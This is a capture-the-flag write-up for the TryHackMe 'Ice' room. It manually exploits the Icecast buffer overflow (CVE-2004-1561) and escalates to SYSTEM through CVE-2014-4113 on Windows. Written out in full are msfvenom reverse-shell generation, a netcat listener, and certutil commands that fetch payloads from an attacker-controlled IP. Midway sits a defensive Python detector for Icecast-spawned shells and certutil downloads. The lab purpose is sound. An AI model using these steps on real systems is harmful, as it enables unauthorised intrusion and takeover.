TryHackMe: Ice Manual Exploitation
Today we will take a look at TryHackMe: Ice, but this time we are going to use manual exploitation. My goal in sharing this writeup is to show you how to manually exploit and then elevate your privileges on a Windows machine. Please try to understand each step and take notes.
Enumeration/Scanning
Nmap Command:
nmap -sCV -Pn --open -p- -v 10.10.97.184 -oN Nmap:10.10.97.184
Finding Vulnerability and Exploit
- We can see that the Icecast streaming service is running on port 8000. We take a look at the cvedetails site, which gives detailed information about common vulnerabilities, and search for Icecast.
As we can see, Icecast is vulnerable to CVE-2004-1561. This vulnerability is a buffer overflow and allows remote code execution (RCE).
Before using our exploit, we will make some minor changes to the code. First we take a look at the icecast.py payload code.
Here is the command for shellcode generation that we will use inside the code. In our terminal we use this command to generate shellcode for our LHOST and LPORT:
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=<Your VPN IP> LPORT=<Port you like> -f python -b '\x00\x0a\x0d'
Now we can modify the payload and replace its shellcode with ours.
- Note: remove the 'b' prefix from the shellcode lines before using them.
nano Icecast.py
Using the Exploit to Gain a Shell
- Now it is time to use this exploit to get a reverse shell from the target machine. We use two terminals.
- Terminal 1.
We run our exploit against the target machine IP:
python3 Icecast.py <Target Machine Ip> 8000
- Terminal 2.
We set up a netcat listener to catch our shell.
nc -lvnp <Port> #the LPORT number you gave in the msfvenom command
Privilege Escalation
- Now that we have a remote shell, it is time to elevate our privileges. We use the winPEAS and Windows Exploit Suggester tools.
To transfer the winPEAS file to the target machine we use certutil.
#Deploying Python web server in our terminal
python3 -m http.server <Port> #port is optional, the default is 8000
#Get data on target machine
certutil -split -urlcache -f "http://<VPN Ip>:<Port>/file"
Note: On the target machine we don't have permission to write downloaded files in the current directory. To get around this, go to the C:\Windows\Tasks folder, where we do have write permission.
winPEAS shows us basic system information about the target machine. Copy the systeminfo output into a file; we will use it with Windows Exploit Suggester.
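From the defender's side, the two things this walkthrough does on the host (a shell spawned by the Icecast service process, and certutil used with -urlcache to fetch files) are both easy to spot in process-creation telemetry. The following detection is an added example, not part of the original writeup; it runs over constructed log lines in the shape parent_image|image|command_line (as you might export from Sysmon Event ID 1 or Security 4688), and the paths and URLs in them are made up to mirror the commands above.

```python
"""Flag Icecast-spawned shells and certutil downloads in process-creation logs."""
import re
from typing import List, Tuple

# Constructed sample lines: parent_image|image|command_line.
SAMPLE_LOG = """\
C:\\Program Files (x86)\\Icecast2 Win32\\icecast2.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe
C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\certutil.exe|certutil -split -urlcache -f "http://10.9.216.159:8080/Win64.exe" Exploit.exe
C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\certutil.exe|certutil -urlcache -f http://10.9.216.159:8080/shell.exe shell.exe
C:\\Windows\\explorer.exe|C:\\Windows\\System32\\certutil.exe|certutil -verify mycert.cer
C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe notes.txt
"""

# certutil with -urlcache and a URL on the command line is the LOLBin download pattern;
# legitimate certutil use (e.g. -verify, -hashfile) does not carry -urlcache plus a URL.
CERTUTIL_DOWNLOAD = re.compile(
    r"certutil(\.exe)?\s.*-urlcache\b.*\b(https?://[^\s\"']+)", re.IGNORECASE
)
SHELLS = ("cmd.exe", "powershell.exe")


def analyze(log_text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, finding_type, detail) for every suspicious line."""
    findings: List[Tuple[int, str, str]] = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        parent, image, cmdline = line.split("|", 2)
        # A streaming daemon has no business launching an interactive shell:
        # this is what successful exploitation of the service looks like.
        if parent.lower().endswith("icecast2.exe") and image.lower().endswith(SHELLS):
            findings.append((n, "icecast_spawned_shell", cmdline))
        m = CERTUTIL_DOWNLOAD.search(cmdline)
        if m:
            findings.append((n, "certutil_download", m.group(2)))
    return findings


if __name__ == "__main__":
    for lineno, kind, detail in analyze(SAMPLE_LOG):
        print(f"line {lineno}: {kind}: {detail}")
```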
nano systeminfo.txt
Now it is time to find an exploit with Windows Exploit Suggester:
python3 wes.py --update #to update the tool's database
python3 wes.py systeminfo.txt -e -i "Privilege" #-e and -i are used to filter the exploit output
Our exploit is CVE-2014-4113. This vulnerability lets us use NT AUTHORITY\SYSTEM privileges for limited usage. The source of this exploit is in the GitHub repository named MS14-058.
Now it is time to transfer our exploit to the target machine.
Commands:
python3 -m http.server 8080
certutil -split -urlcache -f "http://10.9.216.159:8080/Win64.exe" Exploit.exe
When you run the exploit with another command as its argument, that command runs as NT AUTHORITY\SYSTEM.
To escalate our privileges we combine a reverse shell with our exploit. First generate the shell:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Transfer the shell executable to the Windows machine:
certutil -split -urlcache -f "http://10.9.216.159:8080/shell.exe"
Now it is time to run our exploit with shell.exe as its argument to get an elevated shell.
In a second terminal we listen on our port.
Now we are SYSTEM.